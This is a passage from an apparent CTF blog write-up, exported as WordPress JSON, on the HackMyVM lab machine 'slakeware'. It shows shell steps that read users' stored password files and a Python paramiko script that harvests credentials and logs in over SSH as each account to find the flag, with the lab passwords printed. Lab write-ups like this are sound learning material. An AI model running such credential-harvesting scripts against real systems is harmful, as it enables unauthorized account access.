$user\nllMttpVCiYPw\nPassword: \nb4el7d@slackware:~$ user=$(id|awk -F&#039;[()]&#039; &#039;{print $(NF-1)}&#039;);pass=$(cat ..\/$user\/mypass.txt);echo $pass;su - $user\nwP26CtkDby6J\nPassword: \nrpj7@slackware:~$ grep -Pnir &#039;hmv&#039; \/home 2&gt;\/dev\/null\n\/home\/rpj7\/.bash_history:7:grep -Pnir &#039;hmv&#039; \/home\n\/home\/rpj7\/user.txt:1:HMV{Th1s1s1Us3rFlag}<\/code><\/pre>\n<p>Here I already knew the result; in practice you have to check at every step....<\/p>\n<h3>Script speedrun<\/h3>\n<p><strong>Here is a script I wrote that quickly finds the user flag; give it a try:<\/strong><\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2024\/9\/11 12:49\n# @Author  : hgbe02\n# @File    : slakeware_brute.py\n\nimport paramiko\n\nusernames = []\npasswords = []\n\ndef ssh_login_with_password(host, port, username, password):\n    # Create a new SSH client object\n    client = paramiko.SSHClient()\n    # Auto-add policy: unknown server host keys are accepted and saved automatically (no host-key verification)\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n    try:\n        # Connect to the SSH server, authenticating with a password\n        client.connect(host, port=port, username=username, password=password)\n\n        # Run a command to collect the usernames\n        stdin, stdout, stderr = client.exec_command(\n            &quot;find ..\/ -name &#039;*pass*&#039; -type f 2&gt;\/dev\/null | awk -F &#039;[\/]&#039; &#039;{print $2}&#039;&quot;\n        )\n        output = stdout.read().decode().splitlines()\n        # print(&quot;[+] 
Username\\n&quot;, output)\n        global usernames\n        for line in output:\n            stripped_line = line.strip()\n            if stripped_line not in usernames:\n                usernames.append(stripped_line)\n\n        # Run a command to collect the passwords\n        stdin, stdout, stderr = client.exec_command(\n            &quot;find ..\/ -name &#039;*pass*&#039; -type f 2&gt;\/dev\/null | xargs cat&quot;\n        )\n        output = stdout.read().decode().splitlines()\n        # print(&quot;[+] Password\\n&quot;, output)\n        global passwords\n        for line in output:\n            stripped_line = line.strip()\n            if stripped_line not in passwords:\n                passwords.append(stripped_line)\n\n    except paramiko.AuthenticationException:\n        print(&quot;Authentication failed, please verify your credentials.&quot;)\n    except paramiko.SSHException as sshException:\n        print(&quot;Unable to establish SSH connection: &quot; + str(sshException))\n    except Exception as e:\n        print(&quot;Exception in connecting to the server: &quot; + str(e))\n    finally:\n        # Close the connection\n        client.close()\n\nssh_login_with_password(&#039;192.168.10.100&#039;, 1, &#039;patrick&#039;, &#039;trYth1sPasS1993&#039;)\n\na = 0\nwhile a &lt; len(usernames):\n    ssh_login_with_password(&#039;192.168.10.100&#039;, 1, usernames[a], passwords[a])\n    a += 1\n\nprint(&#039;[+] username and password ! 
(\u272a\u03c9\u272a)&#039;)\nprint(usernames)\nprint(passwords)\n\n# [&#039;claor&#039;, &#039;kretinga&#039;, &#039;mrmidnight&#039;, &#039;alienum&#039;, &#039;powerful&#039;, &#039;annlynn&#039;, &#039;proxy&#039;, &#039;x4v1l0k&#039;, &#039;icex64&#039;, &#039;mindsflee&#039;,\n# &#039;zacarx007&#039;, &#039;terminal&#039;, &#039;zenmpi&#039;, &#039;sml&#039;, &#039;emvee&#039;, &#039;nls&#039;, &#039;noname&#039;, &#039;nolose&#039;, &#039;sancelisso&#039;, &#039;ruycr4ft&#039;,\n# &#039;tasiyanci&#039;, &#039;lanz&#039;, &#039;pylon&#039;, &#039;wwfymn&#039;, &#039;whitecr0wz&#039;, &#039;bit&#039;, &#039;infayerts&#039;, &#039;rijaba1&#039;, &#039;cromiphi&#039;, &#039;gatogamer&#039;,\n# &#039;ch4rm&#039;, &#039;aceomn&#039;, &#039;kerszi&#039;, &#039;d3b0o&#039;, &#039;avijneyam&#039;, &#039;zayotic&#039;, &#039;kaian&#039;, &#039;c4rta&#039;, &#039;boyras200&#039;, &#039;waidroc&#039;, &#039;ziyos&#039;,\n# &#039;b4el7d&#039;, &#039;rpj7&#039;, &#039;h1dr0&#039;, &#039;catch_me75&#039;, &#039;josemlwdf&#039;, &#039;skinny&#039;]\n#\n# [&#039;JRksNe5rWgis&#039;, &#039;lpV8UG0GxKuw&#039;, &#039;B4ReHPEhmlPt&#039;,\n# &#039;ex0XVRAAjCWX&#039;, &#039;pof2XIpVzYl3&#039;, &#039;S64IamSERUI3&#039;, &#039;GX2xnNNU2Hcc&#039;, &#039;TB7pVPwPUeIW&#039;, &#039;tX5o7AUg2PTd&#039;, &#039;VZFoxk0lqnnc&#039;,\n# &#039;8LCa5IDAELR4&#039;, &#039;Qv0dtvZdfpvN&#039;, &#039;WiEbQP6K4Sg9&#039;, &#039;AQewY20VryO7&#039;, &#039;sj5mu74Nmowb&#039;, &#039;VfS9EIU5C9xw&#039;, &#039;0Vsok2PoVo7t&#039;,\n# &#039;KcHXtRsiUPpw&#039;, &#039;oAGSK1zXcbT8&#039;, &#039;G5UJEpW78pOV&#039;, &#039;JO8dvF60MdXR&#039;, &#039;IBrVGveXM3jI&#039;, &#039;6Mqoo8Pud4Fx&#039;, &#039;VBebiyG62uIg&#039;,\n# &#039;51BwJ9iYO4E7&#039;, &#039;fDZRz4SJOs8z&#039;, &#039;NYURcD5V8k4X&#039;, &#039;eaqz8vJ2pRmU&#039;, &#039;CQBpV2NQ3U6A&#039;, &#039;yjwGMry82S2Y&#039;, &#039;Hz35MslshyXj&#039;,\n# &#039;sXdnu8wF1Yb8&#039;, &#039;rjDwcHDFYBML&#039;, &#039;oHjylQ7402Dd&#039;, &#039;vRdS8PLTnTlW&#039;, 
&#039;bgg9TT9otdD6&#039;, &#039;R23AJFVTQYaB&#039;, &#039;IAuaOSSTZHoh&#039;,\n# &#039;oW19TzLywNIq&#039;, &#039;0aApTUf5E2Eq&#039;, &#039;8eS8I1JGxeeZ&#039;, &#039;llMttpVCiYPw&#039;, &#039;wP26CtkDby6J&#039;, &#039;tnvAny2zwYTV&#039;, &#039;Vkyo6rKvXsIw&#039;,\n# &#039;jLzXNEEFdtLX&#039;, &#039;iJ7EnTBCtUS8&#039;]\n\ndef execute_command(host, port, username, password, command):\n    # Create the SSH client\n    client = paramiko.SSHClient()\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n    try:\n        # Connect to the SSH server\n        client.connect(host, port=port, username=username, password=password)\n\n        # Run the command\n        stdin, stdout, stderr = client.exec_command(command)\n\n        # Read the command output\n        output = stdout.read().decode(&#039;utf-8&#039;).strip()\n        error = stderr.read().decode(&#039;utf-8&#039;).strip()\n\n        if output:\n            print(f&quot;[+] USER:{username} PASS:{password} =&gt; {output}&quot;)\n\n    except Exception as e:\n        print(f&quot;An error occurred: {str(e)}&quot;)\n    finally:\n        # Close the connection\n        client.close()\n\nprint(&quot;[+] Search user flag (\u3063^_^)\u3063&quot;)\nfor i in range(0, len(usernames)):\n    execute_command(&#039;192.168.10.100&#039;, 1, usernames[i], passwords[i], &quot;grep -Pnir &#039;hmv&#039; .\/&quot;)\n\n# [+] username and password ! 
(\u272a\u03c9\u272a)\n# [&#039;claor&#039;, &#039;kretinga&#039;, &#039;mrmidnight&#039;, &#039;alienum&#039;, &#039;powerful&#039;, &#039;annlynn&#039;, &#039;proxy&#039;, &#039;x4v1l0k&#039;, &#039;icex64&#039;, &#039;mindsflee&#039;, &#039;zacarx007&#039;, &#039;terminal&#039;, &#039;zenmpi&#039;, &#039;sml&#039;, &#039;emvee&#039;, &#039;nls&#039;, &#039;noname&#039;, &#039;nolose&#039;, &#039;sancelisso&#039;, &#039;ruycr4ft&#039;, &#039;tasiyanci&#039;, &#039;lanz&#039;, &#039;pylon&#039;, &#039;wwfymn&#039;, &#039;whitecr0wz&#039;, &#039;bit&#039;, &#039;infayerts&#039;, &#039;rijaba1&#039;, &#039;cromiphi&#039;, &#039;gatogamer&#039;, &#039;ch4rm&#039;, &#039;aceomn&#039;, &#039;kerszi&#039;, &#039;d3b0o&#039;, &#039;avijneyam&#039;, &#039;zayotic&#039;, &#039;kaian&#039;, &#039;c4rta&#039;, &#039;boyras200&#039;, &#039;waidroc&#039;, &#039;ziyos&#039;, &#039;b4el7d&#039;, &#039;rpj7&#039;, &#039;h1dr0&#039;, &#039;catch_me75&#039;, &#039;josemlwdf&#039;, &#039;skinny&#039;]\n# [&#039;JRksNe5rWgis&#039;, &#039;lpV8UG0GxKuw&#039;, &#039;B4ReHPEhmlPt&#039;, &#039;ex0XVRAAjCWX&#039;, &#039;pof2XIpVzYl3&#039;, &#039;S64IamSERUI3&#039;, &#039;GX2xnNNU2Hcc&#039;, &#039;TB7pVPwPUeIW&#039;, &#039;tX5o7AUg2PTd&#039;, &#039;VZFoxk0lqnnc&#039;, &#039;8LCa5IDAELR4&#039;, &#039;Qv0dtvZdfpvN&#039;, &#039;WiEbQP6K4Sg9&#039;, &#039;AQewY20VryO7&#039;, &#039;sj5mu74Nmowb&#039;, &#039;VfS9EIU5C9xw&#039;, &#039;0Vsok2PoVo7t&#039;, &#039;KcHXtRsiUPpw&#039;, &#039;oAGSK1zXcbT8&#039;, &#039;G5UJEpW78pOV&#039;, &#039;JO8dvF60MdXR&#039;, &#039;IBrVGveXM3jI&#039;, &#039;6Mqoo8Pud4Fx&#039;, &#039;VBebiyG62uIg&#039;, &#039;51BwJ9iYO4E7&#039;, &#039;fDZRz4SJOs8z&#039;, &#039;NYURcD5V8k4X&#039;, &#039;eaqz8vJ2pRmU&#039;, &#039;CQBpV2NQ3U6A&#039;, &#039;yjwGMry82S2Y&#039;, &#039;Hz35MslshyXj&#039;, &#039;sXdnu8wF1Yb8&#039;, &#039;rjDwcHDFYBML&#039;, &#039;oHjylQ7402Dd&#039;, &#039;vRdS8PLTnTlW&#039;, &#039;bgg9TT9otdD6&#039;, &#039;R23AJFVTQYaB&#039;, &#039;IAuaOSSTZHoh&#039;, 
&#039;oW19TzLywNIq&#039;, &#039;0aApTUf5E2Eq&#039;, &#039;8eS8I1JGxeeZ&#039;, &#039;llMttpVCiYPw&#039;, &#039;wP26CtkDby6J&#039;, &#039;tnvAny2zwYTV&#039;, &#039;Vkyo6rKvXsIw&#039;, &#039;jLzXNEEFdtLX&#039;, &#039;iJ7EnTBCtUS8&#039;]\n# [+] Search user flag (\u3063^_^)\u3063\n# [+] USER:rpj7 PASS:wP26CtkDby6J =&gt; .\/user.txt:1:HMV{Th1s1s1Us3rFlag}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>slakeware Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware] \u2514 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-627","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/627","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=627"}],"version-history":[{"count":4,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/627\/revisions"}],"predecessor-version":[{"id":804,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/627\/revisions\/804"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=627"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=627"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/
tags?post=627"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}